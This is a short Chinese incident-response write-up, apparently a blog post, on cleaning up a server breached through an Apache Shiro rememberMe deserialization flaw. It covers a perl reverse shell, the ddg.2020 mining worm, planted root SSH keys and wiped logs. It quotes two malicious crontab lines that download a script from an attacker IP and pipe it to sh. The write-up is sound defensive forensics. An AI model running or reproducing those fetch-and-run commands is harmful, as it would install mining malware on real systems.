背景
某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell。出于做安全的谨慎,马上出现场应急,确认漏洞。该漏洞存在在cookie字段中的rememberMe字段中,可以RCE
漏洞应急
来到现场后,发现已经升级了,漏洞确认修复完成,只能查看以前的攻击痕迹。
查看账号情况
首先查看账户文件/etc/passwd,修改时间和内容没有什么问题
stat /etc/passwd
cat /etc/passwd
查看文件情况
查看最近修改过的文件没看到特殊异常
ls -alst / -m -10 -name *
查看进程
查看进程
ps aux
看到异常 perl nc2.pl 后面参数跟着一个灯塔国地址,马上想到是反弹的shell,查问漏洞检测者,果真是,确认无害后kill进程。
查看网络连接
netstat -anop | grep tcp
发现服务器对外连接很多22端口,觉得异常,服务器主动对外发起连接22端口,很少见,询问业务也没有这类业务。看相关进程号,查看进程名ddg.2020。明显是一个矿马,经排查服务器上还启动redis和memcached。都是未授权访问。目测,是对外发起6379未授权漏洞的利用,写了root下的id_rsa.pub然后尝试22登录,看下自己的root下的.sshd,果真有id_rsa.pub不正常,因为都不适用root登录遂删除。查看进程目录。/tmp下面的,没有这个文件样板,全盘搜,只有ddg.2020.db没有ddg.2020,随机google,发现该样本会删除自己的文件,并启动定时任务去下载自己。
sudo -i
crontab -e
没有发现问题,还有一个地方
cat /var/spool/cron/crontabs/root
果然看到
curl -fsSL https://218.248.40.228:8443/i.sh | sh
wget -g -O -http://218.248.40.228:8443/i.sh | sh
马上配置阻断
查看进程运行时间对应的操作
history #只有四百多条,很明显不对
who /var/log/wtmp
last
last /var/run/utmp #
发现那天的登录日志被清理。
查看VPC内其他主机,都不存在该蠕虫,那么肯定就是通过getshell打进来,然后种了样本之后离开的。
总结
异常的发现在于明显区别于正常使用用途的网络连接。